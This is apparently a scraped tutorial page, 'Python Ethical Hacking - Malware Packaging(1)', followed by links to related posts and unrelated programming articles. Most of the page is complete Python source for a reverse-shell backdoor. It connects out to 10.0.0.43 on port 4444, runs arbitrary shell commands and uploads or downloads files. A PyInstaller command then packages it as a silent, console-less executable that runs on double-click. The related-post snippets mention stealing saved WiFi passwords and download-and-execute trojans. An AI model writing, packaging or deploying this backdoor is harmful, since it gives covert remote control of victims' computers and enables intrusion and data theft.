PACKAGING

  • Convert python program into an executable that:

    • Packages all program files into a single executable.
    • Works without a python interpreter.
    • Get executed when double-clicked.
  • For best results package the program from the same OS as the target.

    • EG if the target is Windows then package the program from a Windows computer with a python interpreter.

Install PyInstaller firstly.

Refer to : https://pyinstaller.readthedocs.io/en/latest/installation.html

Polish the backdoor code to fit the silent executable.

#!/usr/bin/env python

import json

import socket

import subprocess

import os

import base64

import sys

class Backdoor:

    def __init__(self, ip, port):

        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        self.connection.connect((ip, port))

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def change_working_directory_to(self, path):

        os.chdir(path)

        return "[+] Changing working directory to " + path

    def execute_system_command(self, command):

        DEVNULL = open(os.devnull, "wb")

        return subprocess.check_output(command, shell=True, stderr=DEVNULL, stdin=DEVNULL)

    def read_file(self, path):

        with open(path, "rb") as file:

            return base64.b64encode(file.read())

    def write_file(self, path, content):

        with open(path, "wb") as file:

            file.write(base64.b64decode(content))

            return "[+] Upload successful."

    def run(self):

        while True:

            command = self.reliable_receive()

            try:

                if command[0] == "exit":

                    self.connection.close()

                    sys.exit()

                elif command[0] == "cd" and len(command) > 1:

                    command_result = self.change_working_directory_to(command[1])

                elif command[0] == "upload":

                    command_result = self.write_file(command[1], command[2])

                elif command[0] == "download":

                    command_result = self.read_file(command[1]).decode()

                else:

                    command_result = self.execute_system_command(command).decode()

            except Exception:

                command_result = "[-] Error during command execution."

            self.reliable_send(command_result)

my_backdoor = Backdoor("10.0.0.43", 4444)

my_backdoor.run()

Convert the python program to an executable program.

C:\Python37\Scripts\pyinstaller.exe reverse_backdoor.py --onefile --noconsole

Find and double-click the reverse-backdoor.exe program in the dist folder.

The executable program runs perfectly.

Python Ethical Hacking - Malware Packaging(1)的更多相关文章

  1. Python Ethical Hacking - Malware Packaging(2)

    PACKAGING FOR WINDOWS FROM LINUX For best results package the program from the same OS as the target ...

  2. Python Ethical Hacking - Malware Packaging(4)

    Converting Python Programs to Linux Executables Note: You can not execute the program on Linux by do ...

  3. Python Ethical Hacking - Malware Packaging(3)

    Convert Python Programs to OS X Executables https://files.pythonhosted.org/packages/4a/08/6ca123073a ...

  4. Python Ethical Hacking - Malware Analysis(1)

    WRITING MALWARE Download file. Execute Code. Send Report. Download & Execute. Execute & Repo ...

  5. Python Ethical Hacking - Malware Analysis(4)

    DOWNLOAD_FILE Download files on a system. Once packaged properly will work on all operating systems. ...

  6. Python Ethical Hacking - Malware Analysis(3)

    Stealing WiFi Password Saved on a Computer #!/usr/bin/env python import smtplib import subprocess im ...

  7. Python Ethical Hacking - Malware Analysis(2)

    Filtering Command Output using Regex #!/usr/bin/env python import smtplib import subprocess import r ...

  8. Python Ethical Hacking - TROJANS Analysis(2)

    DOWNLOAD & EXECUTE PAYLOAD A generic executable that downloads & executes files. Disadvantag ...

  9. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

随机推荐

  1. JAVA设计模式 1 设计模式介绍、单例模式的理解与使用

    数据结构我们已经学了一部分了.是该了解了解设计模式了.习惯了CRUD的你,也该了解了解这一门神器.我为啥要说是神器呢? 因为在大厂的面试环节.以及很多的比如 Springboot Mybatis 等开 ...

  2. class 类组件:

    ES6  中的class 类组件: // class 关键字:确定一个类型student以类的概念存在 class student{ //构造函数 是默认自动执行 // 初始化 name age 属性 ...

  3. Java技术开发标准JSR介绍

    JSR我们需要先提及JCP(Java Community Process SM(JCP SM)).JCP是为Java技术开发标准技术规范的机制.任何人都可以注册并参与审阅和提供Java规范请求(JSR ...

  4. 前端笔记(关于解决打包时报node-sass错误的问题)

    这个问题之前反复出现,试过重新从其他同事将node_modules拿过来用,但是过了几天又出同样的问题 去网上百度了好久,大多数都说是node-sass重装一下就行.可是我这边卸载都无法卸载,何谈重装 ...

  5. 原生PHP连接MySQL数据库

    <?php //1.连接数据库 // mysqli_connect('主机名','用户名','密码'); $link = @mysqli_connect('localhost','usernam ...

  6. C#数据结构与算法系列(十五):排序算法(SortAlgorithm)

    1.介绍 排序是将一组数据,以指定的顺序进行排序的过程 2.分类 内部排序法:指将需要处理的所有数据都加载到内部存储器中进行排序 外部排序法:数据量过大,无法全部加载到内存中,需要借助外部存储进行排序

  7. IOT设备SmartConfig实现

    一般情况下,IOT设备(针对wifi设备)在智能化过程中需要连接到家庭路由.但在此之前,需要将wifi信息(通常是ssid和password,即名字和密码)发给设备,这一步骤被称为配网.移动设备如An ...

  8. openstack Rocky 社区版部署1.3 安装OpenStack packages

    1 installing the Rocky release on all nodes. yum install centos-release-openstack-rocky 安装之后,会在/etc/ ...

  9. ceph rbd块存储挂载及文件存储建立

    一.rbd块存储挂载 1 创建一个OSD pool # ceph osd pool create rbd1 128 查询存储空间使用 # ceph df GLOBAL: SIZE AVAIL RAW ...

  10. oracle数据库插入日期格式字符串给date类型字段

    首先执行 alter session set nls_date_format='yyyy-mm-dd  hh24:mi:ss'; 然后执行insert语句而无需使用to_date函数